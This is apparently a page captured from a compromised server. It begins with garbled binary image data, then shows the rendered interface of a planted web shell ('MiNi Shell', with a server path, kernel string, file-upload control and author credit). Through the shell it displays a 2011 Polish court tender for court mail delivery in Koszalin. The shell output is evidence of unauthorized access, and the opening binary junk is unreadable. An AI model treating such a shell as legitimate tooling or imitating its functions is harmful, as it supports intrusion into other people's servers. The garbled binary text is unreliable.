JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110504/98880-N-2011.html

<p class="kh_header"><b>Koszalin: Usługa doręczania przesyłek sądowych przez pracowników Sadu Rejonowego w Koszalinie</b><br>
<b>Numer ogłoszenia: 98880 - 2011; data zamieszczenia: 04.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Rejonowy w Koszalinie , ul. gen. Wł. Andersa 34, 75-950 Koszalin, woj. zachodniopomorskie, tel. 094 3428609, faks (094) 347-69-60, 342-29-07.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa doręczania przesyłek sądowych przez pracowników Sadu Rejonowego w Koszalinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest doręczanie przesyłek sądowych na terenie miasta Koszalina oraz okolic.
Przedmiot zamówienia podzielony został na części obejmujące następujące rejony (ulice, miejscowości):

Część I:
Miasto Koszalin
1) ul. Chałubińskiego
2) ul. Hanki Sawickiej
3)ul. Jutrzenki
4) ul. Karłowicza
5) ul. Kochanowskiego
6) ul. Kopernika
7) ul. Krucza
8) ul. Księżycowa
9) ul. Leśna
10) ul. Mireckiego
11) ul. Norwida
12) ul. Nowowiejskiego
13) ul. Ogińskiego
14) ul. Ogrodowa
15) ul. Orląt Lwowskich
16) ul. Partyzantów
17) ul. Reja
18) ul. Rejtana
19) ul. Rolna
20) ul. Sportowa
21) ul. Sygietyńskiego
22) ul. Tęczy
23) ul. Wieniawskiego
24) ul. Wybickiego
25) ul. Zorzy
26) ul. Zubrzyckiego 
Szacowany zakres zamówienia w okresie obowiązywania umowy - 3600 szt.


Część II:
Miasto Koszalin 
1) ul. Andersa
2) ul. Asnyka
3) ul. Bogusława II
4) ul. Bolesława Chrobrego
5) ul Bolesława  Krzywoustego
6) ul. Dąbrówki
7) ul. Dworcowa
8) ul. Grodzka
9) ul. Grunwaldzka
10) ul. Jana z Kolna
11) ul. Kazimierza Wielkiego
12) ul. Księdza Domina
13) ul. Księżnej Anastazji
14) ul. Laskonogiego
15) ul. Marii Ludwiki
16) ul. Mickiewicza
17) ul. 1 Maja
18) ul. Niepodległości
19) ul. Okrzei
20) ul. Pocztowa
21) ul. Podgrodzie
22) ul. Połtawska
23) ul. Rynek Staromiejski
24) ul. Rzemieślnicza
25) ul. Spółdzielcza
26) ul. Targowa
27) ul. Wyszyńskiego
28) ul. Zawiszy Czarnego
29) ul. Zwycięstwa - do numeru 120
Szacowany zakres zamówienia w okresie obowiązywania umowy - 8400 szt.

Część III:
Miasto Koszalin
1) ul. Akacjowa
2) ul. Artylerzystów
3) ul. Azaliowa
4) ul. Bajkowa
5) ul Batorego
6) ul. Bartłomieja
7) ul. Bema
8) ul. Bonifacego
9) ul. Botaniczna
10) ul. Bożydara
11) ul. Brzoskwiniowa
12) ul. Bzów
13) ul. Chodkiewicza
14) ul. Cedrowa
15) ul. Cisowa
16) ul. Czeremchowa
17) ul. Czereśniowa
18) ul. Czarnieckiego
19) ul. Czwartaków
20) ul. Dębowa
21) ul. Dywizji Drezdeńskiej
22) ul. Gerberowa
23) ul. Grabowa
24) ul. Hebanowa
25) ul. Hubalczyków
26) ul. Jabłoniowa
27) ul. Jaśminowa
28) ul. Jaworowa
29) ul. Jarzębinowa
30) ul. Jesionowa
31) ul. Jodłowa
32) ul. Kadetów
33) ul. Kalinowa
34) ul. Kasztanowa
35) ul. Klonowa
36) ul. Krawiecka
37) ul. Kubusia Puchatka
38) ul. Kupiecka
39) ul. Laurowa
40) ul. Lubiatowska
41) ul. Macieja
42) ul. Mahoniowa
43) ul. Modrzewiowa
44) ul. Morelowa
45) ul. Mścisława
46) ul. Mściwoja
47) ul. Obrońców Helu
48) ul. Orzechowa
49) ul. Pancerniaków
50) ul. Pankracego
51) ul. Parkowa
52) ul. Platanowa
53) ul. Podchorążych
54) ul. Polnych Kwiatów
55) ul. Przybysława
56) ul. Przyjaźni
57) ul. Sadowa
58) ul. Serwacego
59) ul. Sezamkowa
60) ul. Sianowska
61) ul. Słoneczna
62) ul. Sosnowa
63) ul. Sowińskiego
64) ul. Synów Pułku
65) ul. Św. Wojciecha
66) ul. Światowida 
67) ul. Świerkowa
68) ul. Świętopełka
69) ul. Topolowa
70) ul. Tulipanów
71) ul. Ułańska
72) ul. Walecznych
73) ul. Westerplatte
74) ul. Wiązowa
75) ul. Wierzbowa
76) ul. Wiśniowa
77) ul. Wojska Polskiego
78) ul. Wopistów
79) ul. Leszczynowa
80) ul. Lotników
81) ul. Zalesie
82) ul. Wrześniowa
83) ul. Zamenhofa
84) ul. Zielona
85) ul. Ziemowita
86) ul. Zdobywców Wału Pomorskiego
87) ul. Zwycięstwa - od ul. 4 Marca
88) ul. Ruszczyca
89) ul. Saperów
Szacowany zakres zamówienia w okresie obowiązywania umowy - 6240 szt.

Część IV:
Miasto Koszalin
1) ul. Akademicka
2) ul. Boczna
3) ul. Baczewskiego
4) ul. Bauera
5) ul Bliska
6) ul. Bożka
7) ul. Chełmska
8) ul. Chrzanowskiego
9) ul. Daleka
10) ul. Dobra
11) ul. Dynarskiego
12) ul. Doroszewskiego
13) ul. Fijałkowskiego
14) ul. Filio
15) ul. Gąszczak
16) ul. Golisza
17) ul. Górskiego
18) ul. Grochowskiego
19) ul. Jelec
20) ul. Kajki
21) ul. Klemensiewicza
22) ul. Kostenckiego
23) ul. Kotarbińskiego
24) ul. Kołłątaja
25) ul. Kruczkowskiego
26) ul. Krzyżanowskiego
27) ul. Ks. Popiełuszki
28) ul. Kujawska
29) ul. Lubelska
30) ul. Lelewela
31) ul. Machniewicza
32) ul. Macierzy
33) ul. Malownicza
34) ul. Mazurska
35) ul. Młodości
36) ul. Oskara Lange
37) ul. Pieniężnego
38) ul. Podlaska
39) ul. Pomorska
40) ul. Prosta
41) ul. Próchnika
42) ul. Radości
43) ul. Rodła
44) ul. Siennickiego
45) ul. Sierocińskiego
46) ul. Sierpińska
47) ul. Staszica
48) ul. Spasowskiego
49) ul. Śniadeckich
50) ul. Śląska
51) ul. Śmiała
52) ul. Śnieżka
53) ul. Tatarkiewicza
54) ul. Tradycji
55) ul. Turowskiego
56) ul. Warmińska
57) ul. Wąwozowa
58) ul. Wesoła
59) ul. Weteranów
60) ul. Wielkopolska
61) ul. Własna
62) ul. Wspólna
63) ul. Wyki
64) ul. Żebrowskiego
65) ul.  Maćkowicza
66) ul. Domańskiego
67) ul. Gajowa
68) ul. Małopolska
69) ul. Sudecka
70) ul. Boczna
Szacowany zakres zamówienia w okresie obowiązywania umowy - 9600 szt.

Część V:
Kretomino (Gmina Manowo)
1) ul. Agrestowa
2) ul. Aroniowa
3) ul. Boczna
4) ul. Boczniaków
5) ul. Borowików
6) ul. Familijna
7) ul. Grzybowa
8) ul. Jeżynowa
9) ul. Kretomińska
10) ul. Koszalińska
11) ul. Kościelna
12) ul. Kwiatowa
13) ul. Kurek
14) ul. Lipowa
15) ul. Maślaków
16) ul. Malinowa
17) ul. Ogrodników
18) ul. Opieniek
19) ul. Pieczarek
20) ul. Poziomkowa
21) ul. Porzeczkowa
22) ul. Polna
23) ul. Rolna
24) ul. Rydzów
25) ul. Słoneczna
26) ul. Trufli
27) ul. Truskawkowa
28) ul. Winogronowa
29) ul. Zielonek 
Raduszka 
30) ul. Bratków
31) ul. Bławatków
32) ul. Chabrów
33) ul. Fiołków
34) ul. Goździków
35) ul. Irysów
36) ul. Jaskrów
37) ul. Jaskółek
38) ul. Kaczeńców
39) ul. Krokusów
40) ul. Konwalii
41) ul. Lawendy
42) ul. Łubinów
43) ul. Maków
44) ul. Malw
45) ul. Nagietków
46) ul. Nasturcji
47) ul. Paproci
48) ul. Rumianków
49) ul. Róż
50) ul. Szafirków
51) ul. Stokrotek
52) ul. Słoneczników
53) ul. Skowronków
54) ul. Sikorek
55) ul. Słowików
56) ul. Wrzosów 
Szacowany zakres zamówienia w okresie obowiązywania umowy - 1200 szt.

Część VI:
Miasto Koszalin 
1) ul. Chełmońskiego
2) ul. Boya Żeleńskiego
3) ul. Grottgera
4) ul. Kasprowicza
5) ul. Konopnickiej
6) ul. Korczaka
7) ul. Piaskowa
8) ul. Reymonta
9) ul. Staffa
10) ul. Struga
11) ul. Tetmajera
12) ul. Wojska Polskiego
13) ul. Wyspiańskiego
14) ul. Żeromskiego
15) ul. Żwirowa
16) ul. Zwycięstwa do ul. 4 Marca
17) ul. 4 Marca 
Szacowany zakres zamówienia w okresie obowiązywania umowy - 6720 szt.

Część VII:
Miasto Koszalin 
1) ul. Bohaterów Warszawy
2) ul. BoWiD
3) ul. Bosmańska
4) ul. Brzozowa
5) ul. Bursztynowa
6) ul. Dokerów
7) ul. Energetyków
8) ul. Franciszkańska
9) ul. Jantarowa
10) ul. Jachtowa
11) ul. Jasna
12) ul. Kapitańska
13) ul. Kinga
14) ul. Kosynierów
15) ul. Krańcowa
16) ul. Kutrowa
17) ul. Marynarzy
18) ul. Mieszka I
19) ul. Miła
20) ul. Morska
21) ul. Nerudy
22) ul. Picassa
23) ul. Przemysłowa
24) ul. Różana
25) ul. Rybacka
26) ul. Sienkiewicza
27) ul. Spokojna
28) ul. Stoczniowców
29) ul. Syrenki
30) ul. Szarych Szeregów
31) ul. Szkutnicza
32) ul. Szczecińska
33) ul. Szyprów
34) ul. Teligi
35) ul. Tkacka
36) ul. Wydmowa
37) ul. Zacisze
38) ul. Żeglarska
39) ul. Żwirki i Wigury
40) ul. Lniana  
Szacowany zakres zamówienia w okresie obowiązywania umowy - 7800 szt.

Część VIII:
Miasto Koszalin
1) ul. Dąbka
2) ul. Dmowskiego
3) ul. Gierczak
4) ul. Kilińszczaków
5) ul. Kościuszkowców
6) ul. Kwiatkowskiego
7) ul. Limanowskiego
8) ul. Na Skarpie
9) ul. Plater
10) ul. Robotnicza
11) ul. Sikorskiego
12) ul. Starzyńskiego
13) ul. Sucharskiego
14) ul. Warskiego
15) ul. Kostrzewy 
Szacowany zakres zamówienia w okresie obowiązywania umowy - 4320 szt.

Część IX:
Miasto Koszalin
1) ul. Kamieniarska
2) ul. Gnieźnieńska
3) ul. Kolejowa
4) ul. Kwiatowa
5) ul. Lechicka
6) ul. Lubuszan
7) ul. Łużycka
8) ul. Lutyków
9) ul. Obotrytów
10) ul. Piotra Skargi
11) ul. Polan
12) ul. Połczyńska
13) ul. Poprzeczna
14) ul. Powstańców Wlkp.
15) ul. Radogoszczańska
16) ul. Ratajczaka
17) ul. Sarzyńska
18) ul. Słowiańska
19) ul. Strażacka
20) ul. Wenedów
21) ul. Żytnia
22) ul. Zbożowa
23) ul. Pszeniczna 
Szacowany zakres zamówienia w okresie obowiązywania umowy - 7200 szt.

Część X:
Miasto Koszalin
1) ul. Fałata
2) ul. Gałczyńskiego
3) ul. Gdańska
4) ul. Jagoszewskiego
5) ul. Jana Pawła II
6) ul. Okulickiego
7) ul. Szenwalda
8) ul. Tuwima
9) ul. Wańkowicza
10) ul. Władysława IV 
Szacowany zakres zamówienia w okresie obowiązywania umowy - 6000 szt.

Część XI:
Miasto Koszalin
1) ul. Piłsudskiego od nr 1 do nr 35 i od nr 2 do nr 32
2) ul. Waryńskiego
3) ul. Matejki
4) ul. Pileckiego
5) ul. Jedności
6) ul. Głowackiego 
Szacowany zakres zamówienia w okresie obowiązywania umowy - 7200 szt.

Część XII:
Miasto Koszalin
1) ul. Piłsudskiego od nr 37 do nr 97 i od nr 34 do nr 98
2) ul. Moniuszki
3) ul. Hołdu Pruskiego
4) ul. Broniewskiego
5) ul. Traugutta
6) ul. Chopina
7) ul. Zgody
8) ul. Kościuszki
9) Plac Polonii
Szacowany zakres zamówienia w okresie obowiązywania umowy - 3000 szt.

Część XIII:
Miasto Koszalin
1) Al. Monte Cassino
2) ul. Bałtycka
3) ul. Batalionów Chłopskich
4) ul. Budowniczych
5) ul. Dąbrowskiego
6) ul. Dąbrowszczaków
7) ul. Kutrzeby
8) ul. Młyńska
9) ul. Odrodzenia
10) ul. Papiernicza
11) ul. Piastowska
12) ul. Pionierów 
13) ul. Podgórna
14) ul. Projektantów
15) ul. Strumykowa
16) Plac Kilińskiego
Szacowany zakres zamówienia w okresie obowiązywania umowy - 4560 szt.

Część XIV:
Miasto Koszalin
1) ul. Barlickiego
2) ul. Drzymały
3) ul. Dzieci Wrzesińskich
4) ul. Harcerska
5) ul. Kaszubska
6) ul. Komisji Edukacji Narodowej
7) ul. Konstytucji 3 Maja
8) ul. Krakusa i Wandy
9) ul. Legnicka
10) ul. Mariańska
11) ul. Modrzejewskiej
12) ul. Orla
13) ul. Płowce
14) ul. Rzeczna
15) ul. M. C. Skłodowskiej
16) ul. Szeroka
17) ul. Wróblewskiego
18) ul. Zakole
19) ul. Szpitalna
Szacowany zakres zamówienia w okresie obowiązywania umowy - 7200 szt.

Część XV:
Całe Miasto i Gmina Darłowo
Szacowany zakres zamówienia w okresie obowiązywania umowy - 9600 szt.
 
Część XVI:
Miejscowości Manowo i Bonin
Szacowany zakres zamówienia w okresie obowiązywania umowy - 1200 szt.

Część XVII:
Całe Miasto Sianów
Szacowany zakres zamówienia w okresie obowiązywania umowy - 3600 szt.

Część XVIII:
Całe Miasto Białogard
Szacowany zakres zamówienia w okresie obowiązywania umowy - 3600 szt.

Część XIX:
Miejscowość Rosnowo
Szacowany zakres zamówienia w okresie obowiązywania umowy - 240 szt.

Sposób realizacji przedmiotu zamówienia (jednakowy dla wszystkich części zamówienia):
1) Wykonawca wykonuje przedmiot zamówienia osobiście,
2) Wykonawca odbiera przesyłki codziennie z Biura Podawczego,
3) Wykonawca będzie wykonywał przedmiot zamówienia po godzinach pracy, od poniedziałku do soboty.
4) Wykonawca doręcza przesyłkę adresatowi, dorosłemu domownikowi lub innej upoważnionej do odbioru osobie dorosłej,
5) Osoba odbierająca przesyłkę potwierdza fakt doręczenia na zwrotnym potwierdzeniu odbioru czytelnym podpisem oraz zamieszcza przy podpisie datę odbioru przesyłki,
6) Wykonawca po doręczeniu przesyłki dostarcza w dniu następnym zwrotne potwierdzenie odbioru,
7) Wykonawca, w przypadku otrzymania przesyłki pilnej, podejmuje próbę doręczenia jeszcze w dniu jej otrzymania,
8) Wykonawca próby doręczenia podejmuje ni mniej niż trzykrotnie,
9) Przesyłki, które winny być doręczone w terminie do 4 tygodni Wykonawca zwraca w terminie trzech dni natomiast przesyłki, których termin doręczenia przekracza 1 miesiąc Wykonawca zwraca w terminie 7 dni podejmując w tym czasie kilka prób doręczenia,
10) Przesyłki niedoręczone Wykonawca zwraca do Biura Podawczego, 
11) W przypadku braku możliwości doręczenia przesyłki Wykonawca zamieszcza na kopercie adnotację o przyczynie niemożności doręczenia przesyłki,
12) Po upływie miesiąca, w którym były świadczone usługi, Wykonawca wystawia Zamawiającemu rachunek za wykonana usługę (w przypadku Wykonawców wspólnie składających ofertę każdy z Wykonawców przedkłada odrębny rachunek),
13) Wykonawca zobowiązany jest prowadzić rejestr przesyłek, w którym odnotowuje informacje związane z każdą z przesyłek a w szczególności: imię i nazwisko adresata, adres, datę doręczenia lub daty próby doręczeń oraz przyczynę niedoręczenia przesyłki..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.11.20.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że jest pracownikiem Sądu Rejonowego w Koszalinie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o zatrudnieniu w Sądzie Rejonowym w Koszalinie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://koszalin.so.gov.pl/bip/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Rejonowy w Koszalinie
ul. Wł. Andersa 34
75-950 Koszalin
I piętro pok. 91.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2011 godzina 10:00, miejsce: Sąd Rejonowy w Koszalinie
ul. Wł. Andersa 34
75-950 Koszalin
I piętro pok. 91 lub Biuro Podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com